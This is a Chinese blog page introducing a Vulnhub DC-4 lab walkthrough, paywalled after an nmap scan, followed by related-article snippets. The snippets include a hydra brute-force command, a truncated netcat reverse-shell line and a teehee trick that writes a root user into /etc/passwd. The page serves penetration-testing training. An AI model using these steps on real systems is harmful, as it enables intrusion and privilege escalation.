Vulnhub DC-4 teehee 提权

最新推荐文章于 2025-02-20 21:37:08 发布

原创

最新推荐文章于 2025-02-20 21:37:08 发布 · 1.7k 阅读

3 ·

CC 4.0 BY-SA版权

文章标签：

#teehee #命令执行

Vulnhub 之 DC-4

本文只用于学习知识，不要将其用于非法途径，

前言

DC已经做了一半了，前三次都是基于初学者的，这次的难度就提升了，适合初学者和入门的伙伴。

还是按照常例看看作者是怎么描述的吧。

下载地址

DC-4

描述

DC-4是另一个专门建造的脆弱实验室，目的是获得渗透测试领域的经验。

与以前的DC版本不同，这个版本主要是为初学者/中间用户设计的。只有一面旗帜，但技术上来说，有多个入口，就像上次一样，没有线索。

必须具备Linux技能和熟悉Linux命令行，就像一些基本渗透测试工具的经验一样。

对于初学者来说，谷歌可能会有很大的帮助，但是你可以随时在@DCAU7发推给我寻求帮助，让你重新开始。但是请注意:我不会给你答案，相反，我会给你一个如何前进的想法。</pre>

所以说，谷歌真的很万能。O(∩*∩)O哈哈~*

靶机环境

记得修改DC-4的网络为NAT模式

kali : 192.168.248.130
DC-4 : 192.168.248.128

靶机复现

扫描网段

nmap -sn 192.168.248.0/24

发现目标ip ： 192.168.248.128
扫描端口</

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0zzie

关注关注

4
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Vulnhub靶机实战——DC-4

冠霖L的博客

09-27

3306

靶机DC-4下载地址：https://download.vulnhub.com/dc/DC-4.zip 描述：从靶机DC-3开始，只有一个入口和一个最终的flag，只有拿到root权限才可以发现最终的flag，DC-4也是一样环境：Vmware 15 Pro虚拟机软件 DC-4靶机IP地址：192.168.220.138 Kali的IP地址：...

VulnHub—DC-4

weixin_39219503的博客

01-31

325

01 环境搭建靶机环境下载：https://www.vulnhub.com/entry/dc-4,313/ 题目信息如下，只有一个flag Description DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration te...

参与评论您还未登录，请先登录后发表或查看评论

Vulnhub DC-4

Pai_Space

02-17

658

描述：只有一个标志，但从技术上讲，有多个入口点，就像上次一样，没有线索。 192.168.37.133 直接 submit 就可以登录 hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.37.133 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -f ...

vulnhub 入门DC-4

weixin_52780973的博客

01-01

261

vulnhub 实战靶机 linux teehee提权 hydra爆破登录框 ssh连接收到mail

vulnhub DC-4靶机实战

m0_51195235的博客

10-04

2424

vulnhub DC-4靶机实战

【vulnhub】---DC-4靶机

qq_43168364的博客

08-21

2136

目录一、实验环境二、信息收集三、渗透测试　　1、漏洞发现和利用　　2、提权四、总结一、实验环境靶机：DC-4靶机(192.168.15.152) 攻击机：kali Linux(192.168.15.129) 二、信息收集主机发现端口扫描版本探测和操作系统识别 web指纹识别网站目录扫描三、渗透测试 1、漏洞发现和利用 2、提权四、总结渗透步骤渗透思路 ......

Vulnhub DC-4靶机攻击实战(一)

初学者

12-10

1064

到这里，整个的攻击就算完成了，整体来讲这个难度不是太大，也没有太多的难点，主要就是掌握密码的爆破和Shell的反射等。

Vulnhub靶场 | DC系列 - DC4

哦卷！

08-31

1050

teehee命令可以往一个文件追加内容，可以通过它向/etc/passwd写入内容，新增一个超级用户。爆破出来的用户名为admin，密码为happy，成功登录（也许这里真的是需要爆破来突破）。查看邮件jim，是charles发来的一封邮件，告诉了jim密码：^xHhA&hvim0y。查看了下，charles、sam的家目录下没有什么东西。有邮件，说明该系统时候邮件系统的，查看一下邮件。看一下jim的sudo授权，并没有可利用的~看一下mbox，有权限查看，是一封邮件。jim家目录下有两个文件，一个目录。

Vulnhub-DC-4

KAKA的博客

07-04

345

扫描获取目标 IP 地址:192.168.67.135 nmap -sn 192.168.67.0/24 扫描目标，获取系统信息和开放端口：80 && 22 nmap -A -p- 192.168.67.135 （初步猜想就是通过 web 获取到系统用户密码，再通过 ssh 登陆最后提权的思路）登陆 http://192.168.67.135 ：首先看下 wapplayzer，发现是 Nginx ，但暂时得不到详细版本，故先记录，以防备用页面上写着：Admin Information

vulnhub-dc4

bqnagus

10-05

1250

vulnhub-dc4靶机复现

VulnHub DC: 4

spider的博客

12-01

294

下载地址 https://download.vulnhub.com/dc/DC-4.zip 从nmap 入手（靶机在192.168.1.106） nmap -sT -sV -sC 192.168.1.106 -O -p- 开放了80，22端口。先上个80看看只有一个登陆界面，尝试在username输入’or’1’='1 看看有没有sql注入。重定向回本页面。 ...

Vulnhub靶机 DC-4

菜浪马废的博客

03-23

516

信息收集 `arp-scan -l 扫描本地 nmap -sV 192.168.0.132 扫描靶机开放端口` 开放80端口，访问一下页面是个登录页面，而且可以用爆破来登录，没有验证机制安装pydictor，一个字典生成工具，用它生成一个用户名字典 git clone --depth=1 --branch=master https://www.github.com/landgrey/p...

[Vulnhub] DC-4

weixin_63231007的博客

01-28

951

DC系列靶机-第四弹(hydra爆破密码+teehee命令提权)

[VulnHub]DC-4

cosmoslin的博客

09-07

191

VulnHub——DC-4渗透测试过程记录测试人员：cosmos 目标地址：192.168.131.130 目标账号：未知目标主机：未知信息搜集 1.netdiscover netdiscover -r 192.168.131.0/24 2.masscan masscan --rate=10000 --ports 0-65535 192.168.131.130 3.nmap nmap -A 192.168.131.130 网站测试进入网站发现需要登录,提示admin登录，猜测用户名

vulnhub靶机之DC-4

m0_52328368的博客

08-19

1237

vulnhub之dc-4详细步骤

Vulnhub靶机——DC-4

最新发布

qq_52854348的博客

02-20

1130

Vulnhub靶机 DC-4靶机渗透测试详细流程介绍(附靶机搭建过程) 暴力破解 命令执行漏洞 teehee提权

Vulnhub渗透测试靶机DC-4

weixin_46128614的博客

01-19

544

下载地址：https://www.vulnhub.com/entry/dc-4,313/ nmap没有扫描到什么有用端口直接访问80端口只有一个认证框没有验证 bp爆破admin弱密码发现密码admin qwert 进入后台发现有执行命令的地方抓包发现命令由post包传过去执行的命令由客户端传到了服务端 命令执行获取shell 把nc -e /bin/sh 192.168.49...

DC-4靶场练习—teehee提权

negnegil的博客

06-09

730

DC系列第四个靶机下载地址：https://www.vulnhub.com/entry/dc-4,313/ 老规矩先扫描以下局域网内的主机ip arp-scan -l 扫一下端口： nmap -A -p- 192.168.1.101 只看放了22和80端口，先进80端口看看有什么只有一个表单，猜测Username应该是admin，先不急着爆破。用dirsearch扫了一下目录，只有一个登录界面：所以现在只能从80或22端口找突破口了，22端口需要同时爆破账号和密码，太麻烦而且也不知道能不

/usr/bin/teehee

08-29

在您提供的引用中，没有关于"/usr/bin/teehee"的具体信息。但是根据第二个引用，可以推测"/usr/bin/teehee"可能是一个可执行文件或命令。根据引用中的示例，使用"teehee -a"命令可以将一个账号密码写入/etc/passwd文件中，并使该用户具有root权限。但是请注意，这只是根据推测得出的答案，如果您需要更详细的信息，请提供更多的上下文或明确的问题。123 #### 引用[.reference_title] - *1* [mac下/usr/local/bin No such file or directory问题解决](https://download.youkuaiyun.com/download/weixin_38622777/14052455)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [9.100个渗透测试实战#9（DC-4）](https://blog.youkuaiyun.com/qq_45555226/article/details/105182774)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [DC-4靶机渗透（teehee提权）](https://blog.youkuaiyun.com/single_g_l/article/details/123687657)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]